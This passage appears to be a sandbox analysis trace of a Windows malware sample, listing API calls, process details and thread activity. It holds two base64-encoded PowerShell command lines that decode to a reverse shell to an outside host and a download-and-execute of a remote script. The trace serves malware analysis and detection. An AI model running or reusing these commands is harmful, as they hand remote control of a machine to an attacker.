dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2d2a5f0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGcARABpAHQARgA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABOAFQAawBiAHQAPQAoACQAZwBEAGkAdABGAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABwAG8ASAB6AFkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABnAG0AQwB3AGQAPQAkAE4AVABrAGIAdAAuAFIAZQBhAGQAKAAkAHAAbwBIAHoAWQAsADAALAAkAHAAbwBIAHoAWQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGkAUABCAFoAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcABvAEgAegBZACwAMAAsACQAZwBtAEMAdwBkACkAOwAkAG4ATgBvAHQAbgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAaQBQAEIAWgBtACAAMgA+ACYAMQApACkAOwAkAE4AVABrAGIAdAAuAFcAcgBpAHQAZQAoACQAbgBOAG8AdABuACwAMAAsACQAbgBOAG8AdABuAC4ATABlAG4AZwB0AGgAKQA7ACQATgBUAGsAYgB0AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABnAEQAaQB0AEYALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwBEAGkAdABGAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x2d2a5f0*(hProcess=0x6e0, hThread=0x6dc, dwProcessId=0x728, dwThreadId=0x220)) returned 1
	[0195.879] GetLastError () returned 0x0
	[0195.879] CloseHandle (hObject=0x6dc) returned 1
	[0195.879] GetLastError () returned 0x0
	[0195.879] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x332a00, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x332a00) returned 0x4550
	[0195.881] GetCurrentProcess () returned 0xffffffff
	[0195.881] GetLastError () returned 0x0
	[0195.881] GetCurrentProcess () returned 0xffffffff
	[0195.881] GetLastError () returned 0x0
	[0195.881] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x6e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4f0dc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4f0dc*=0x6dc) returned 1
	[0195.881] GetLastError () returned 0x0

Thread:
	id = 217
	os_tid = 0xb90


Thread:
	id = 218
	os_tid = 0xa80


Thread:
	id = 219
	os_tid = 0x150

	[0189.906] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0189.909] ResetEvent (hEvent=0x398) returned 1
	[0189.909] GetLastError () returned 0x0

Thread:
	id = 223
	os_tid = 0xa8c


Thread:
	id = 347
	os_tid = 0xd84


Process:
	id = "5"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x41e2b000"
	os_pid = "0x8c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 80
	os_tid = 0x8d4

	[0084.267] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0084.687] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0084.687] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0084.687] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0084.688] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0085.322] GetVersionExW (in: lpVersionInformation=0x16dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0085.325] GetVersionExW (in: lpVersionInformation=0x16dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0085.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.353] GetVersionExW (in: lpVersionInformation=0x16dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0085.354] SetErrorMode (uMode=0x1) returned 0x1
	[0085.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16deb0 | out: lpFileInformation=0x16deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0085.356] SetErrorMode (uMode=0x1) returned 0x1
	[0085.359] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e120 | out: lpdwHandle=0x16e120) returned 0x94c
	[0085.361] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d571d0 | out: lpData=0x2d571d0) returned 1
	[0085.363] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e098, puLen=0x16e090 | out: lplpBuffer=0x16e098*=0x2d5726c, puLen=0x16e090) returned 1
	[0085.366] lstrlenW (lpString="䅁") returned 1
	[0085.374] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d57348, puLen=0x16e000) returned 1
	[0085.375] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0085.377] CoTaskMemAlloc (cb=0x2e) returned 0x2d1a90
	[0085.377] lstrcpyW (in: lpString1=0x2d1a90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0085.378] CoTaskMemFree (pv=0x2d1a90) 
	[0085.378] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d5739c, puLen=0x16e000) returned 1
	[0085.378] lstrlenW (lpString="System.Management.Automation") returned 28
	[0085.379] CoTaskMemAlloc (cb=0x3c) returned 0x2d66a0
	[0085.379] lstrcpyW (in: lpString1=0x2d66a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0085.379] CoTaskMemFree (pv=0x2d66a0) 
	[0085.379] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d573f8, puLen=0x16e000) returned 1
	[0085.379] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0085.379] CoTaskMemAlloc (cb=0x20) returned 0x2dc490
	[0085.379] lstrcpyW (in: lpString1=0x2dc490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0085.379] CoTaskMemFree (pv=0x2dc490) 
	[0085.379] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d57438, puLen=0x16e000) returned 1
	[0085.379] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0085.379] CoTaskMemAlloc (cb=0x44) returned 0x2d66a0
	[0085.379] lstrcpyW (in: lpString1=0x2d66a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0085.379] CoTaskMemFree (pv=0x2d66a0) 
	[0085.379] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d574a0, puLen=0x16e000) returned 1
	[0085.379] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0085.379] CoTaskMemAlloc (cb=0x76) returned 0x28c8f0
	[0085.379] lstrcpyW (in: lpString1=0x28c8f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0085.379] CoTaskMemFree (pv=0x28c8f0) 
	[0085.379] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d5753c, puLen=0x16e000) returned 1
	[0085.379] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0085.379] CoTaskMemAlloc (cb=0x44) returned 0x2d66a0
	[0085.379] lstrcpyW (in: lpString1=0x2d66a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0085.379] CoTaskMemFree (pv=0x2d66a0) 
	[0085.379] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d575a0, puLen=0x16e000) returned 1
	[0085.379] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0085.381] CoTaskMemAlloc (cb=0x58) returned 0x24b810
	[0085.381] lstrcpyW (in: lpString1=0x24b810, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0085.382] CoTaskMemFree (pv=0x24b810) 
	[0085.382] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d5761c, puLen=0x16e000) returned 1
	[0085.382] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0085.382] CoTaskMemAlloc (cb=0x20) returned 0x2dc490
	[0085.382] lstrcpyW (in: lpString1=0x2dc490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0085.382] CoTaskMemFree (pv=0x2dc490) 
	[0085.382] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x2d572c4, puLen=0x16e000) returned 1
	[0085.382] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0085.382] CoTaskMemAlloc (cb=0x66) returned 0x25b7d0
	[0085.382] lstrcpyW (in: lpString1=0x25b7d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0085.382] CoTaskMemFree (pv=0x25b7d0) 
	[0085.382] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x0, puLen=0x16e000) returned 0
	[0085.382] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x0, puLen=0x16e000) returned 0
	[0085.382] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16e008, puLen=0x16e000 | out: lplpBuffer=0x16e008*=0x0, puLen=0x16e000) returned 0
	[0085.383] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dfd8, puLen=0x16dfd0 | out: lplpBuffer=0x16dfd8*=0x2d5726c, puLen=0x16dfd0) returned 1
	[0085.384] CoTaskMemAlloc (cb=0x204) returned 0x29eda0
	[0085.384] VerLanguageNameW (in: wLang=0x0, szLang=0x29eda0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0085.385] CoTaskMemFree (pv=0x29eda0) 
	[0085.385] VerQueryValueW (in: pBlock=0x2d571d0, lpSubBlock="\\", lplpBuffer=0x16e028, puLen=0x16e020 | out: lplpBuffer=0x16e028*=0x2d571f8, puLen=0x16e020) returned 1
	[0085.391] GetCurrentProcessId () returned 0x8c4
	[0085.408] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cf50 | out: lpLuid=0x16cf50*(LowPart=0x14, HighPart=0)) returned 1
	[0085.411] GetCurrentProcess () returned 0xffffffffffffffff
	[0085.412] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cf70 | out: TokenHandle=0x16cf70*=0x2f0) returned 1
	[0085.413] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d5aa48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0085.414] CloseHandle (hObject=0x2f0) returned 1
	[0085.418] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x2f0
	[0085.433] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d5aab0, cb=0x200, lpcbNeeded=0x16df88 | out: lphModule=0x2d5aab0, lpcbNeeded=0x16df88) returned 1
	[0085.436] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f600000, lpmodinfo=0x2d5ad20, cb=0x18 | out: lpmodinfo=0x2d5ad20*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0085.437] CoTaskMemAlloc (cb=0x804) returned 0x2de6e0
	[0085.437] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f600000, lpBaseName=0x2de6e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0085.437] CoTaskMemFree (pv=0x2de6e0) 
	[0085.438] CoTaskMemAlloc (cb=0x804) returned 0x2de6e0
	[0085.438] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f600000, lpFilename=0x2de6e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0085.438] CoTaskMemFree (pv=0x2de6e0) 
	[0085.439] CloseHandle (hObject=0x2f0) returned 1
	[0085.446] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x8c4) returned 0x2f0
	[0085.447] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x16e0b8 | out: lpExitCode=0x16e0b8*=0x103) returned 1
	[0085.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d5b088, Length=0x20000, ResultLength=0x16e080 | out: SystemInformation=0x12d5b088, ResultLength=0x16e080*=0x11b90) returned 0x0
	[0085.470] EnumWindows (lpEnumFunc=0x22766ac, lParam=0x0) returned 1
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x40160, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.471] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x538
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x514
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x778
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x778
	[0085.472] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.473] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.473] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.473] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8d4
	[0085.476] GetWindow (hWnd=0x40298, uCmd=0x4) returned 0x0
	[0085.477] IsWindowVisible (hWnd=0x40298) returned 0
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x874
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9a8
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xb40
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xa00
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.477] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9f0
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9e0
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9d0
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9c0
	[0085.478] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9b0
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9a0
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x990
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x980
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x970
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x960
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x950
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x940
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x930
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x920
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x910
	[0085.479] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x900
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8f0
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8e0
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8d0
